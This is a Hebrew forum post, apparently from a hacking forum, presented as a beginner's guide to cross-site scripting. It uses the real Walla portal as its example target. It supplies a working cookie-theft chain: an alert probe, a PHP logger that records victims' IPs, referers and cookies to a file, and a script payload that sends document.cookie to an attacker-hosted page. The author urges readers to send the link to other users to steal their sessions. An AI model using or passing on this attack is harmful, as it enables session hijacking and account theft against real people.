מדריך בסיסי (XSS)
שלום כולם החלטתי ליכתוב מדריך בנושא xss קצת לשנות בימקום כל הזמן sqli.
קודם כל אני ממליץ קצת ליקרוא על xss נוכל להבין כי אני לא יסביר הכל אלה רק את הבסיס תחפשו חומר על זה בגוגל משהו.
לאחר שאתם יודעים קצת על זה נוכל להמשיך במדריך:
לצורך המדריך אני ידגים על וואלה. אוקי קודם כל מציאת חור xss איך מוצאים??
כדי לימצוא חור xss אנחנו צריכים לחפש בכל מיני משבצות חיפוש הכוונה נגיד בהרשמה,חיפוש באתר ועוד.... נגיד בוואלה נלך לאפשריות קרא דואר ואז להרשמת חשבון חדש,נירשום את הקוד הבא במישבצת של שם מישתמש: קוד PHP:
<script>alert("xss")</script>
לאחר שרשמנו זה יציג לנו חלון alert שבתוכו המילה xss זה אומר שיש חור xss עכשיו בטח מה שאתם רוצים לדעת איך נוכל לנצל אותו ומה ביכולתינו לעשות??
לדוגמא אפשר לעשות דפייס ועוד כמה דברים אבל אני לא יפרט על הכל אני יסביר על גניבת הקוקיז של מישתמשים(עוגיות).
איך בעצם ניגנוב את העוגיות?? ניפתח מסמך טקסט חדש ונירשום בו:
קוד PHP:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer= getenv ('HTTP_REFERER');
$fl = fopen('send.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n");
fclose($fl);
?>
ניקרא לו test.php נכין מיסמך טקסט חדש וניקרא לו send.txt ונכניס בו את המילה bla נעלה את שני הקבצים לשרת האיחסון שלנו לדוגמא ripway
עכשיו נחזור לוואלה ונכניס את הקוד הבא במקום שיש את הפריצה(במישבצת של שם מישתמש):
קוד PHP:
<script>document.location.href="www.example.co.il/test.php?cookie="+document.cookie</script>
עכשיו ב www.example.co.il תכניסו תכתובת של האיחסון של הקובץ test.php שהעלינו נגיד ב ripway סתם לדוגמא :
קוד PHP:
http://h1.ripway.com/myxss/test.php
אז נכניס את זה בקוד ככה:
קוד PHP:
<script>document.location.href="http://h1.ripway.com/myxss/test.php?cookie="+document.cookie</script>
לאחר שהכנסו את הקוד זה יעביר אותנו לדף שגונב עוגיות אתם כבר תיראו זה יעביר אותכם לדף ריק אם כתובת ארוכה אז אתם מעתיקים אותה ושולחים אותה לילדים וברגע שהם ניכנסו תיכנסו לקובץ send.txt ואתם תיראו תעוגיות שלהם(מישתמשים שלהם בוואלה)
קרדיט לBuk4 על הקוד php(הקוד של ה send.txt) ועל הכנת המדריך קרדיט לי
ציטוט ההודעה
נכתב במקור על ידי UnioN-ofSite
